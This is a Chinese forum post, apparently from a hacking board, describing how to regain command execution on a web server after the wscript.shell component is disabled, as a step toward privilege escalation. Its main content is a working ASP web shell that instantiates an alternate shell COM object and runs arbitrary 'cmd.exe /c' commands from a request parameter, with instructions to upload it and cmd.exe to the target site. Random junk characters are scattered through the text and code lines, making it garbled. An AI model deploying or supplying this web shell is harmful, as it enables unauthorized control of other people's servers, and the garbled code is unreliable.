wscript.shell删除解决办法

admin

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
3 A5 \$ C) [, T要想让运行命令可以试试这种方法，成功率为五五之数。
/ E! I( U  C9 e1 H把下面代码复制：
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
* J/ ?" |6 S( z: q<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
: j8 }* v* W3 N5 d0 r; @<%
& P: Q/ ~2 `3 a1 k3 g( Z, Yend if
response.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
6 ~  \# S+ y6 W9 k7 o" nresponse.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
6 K# M' x+ }4 s5 D$ m4 T6 `, Jresponse.write("</textarea>")
response.write("<form method='post'>")
6 `5 R# m3 e, i% x( a& T% P1 z; aresponse.write("<input type=text name='c' size=60><br>")
response.write("<input type=submit value='执行'></form>")
" e9 y" a8 Y/ K/ E%>
; x& W- P  N( {* x, H* \
保存为一个asp文件，然后传到网站目录上去
% X/ ^6 c9 }3 F" C2 n# o# m1 X运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
+ Z- J' U7 k/ J5 N  Y5 ?, \我用此成功运行过cacls命令。
2 f* N' J/ i9 Q* z: [
第二那就是运行时出错，可能限制某些代码执行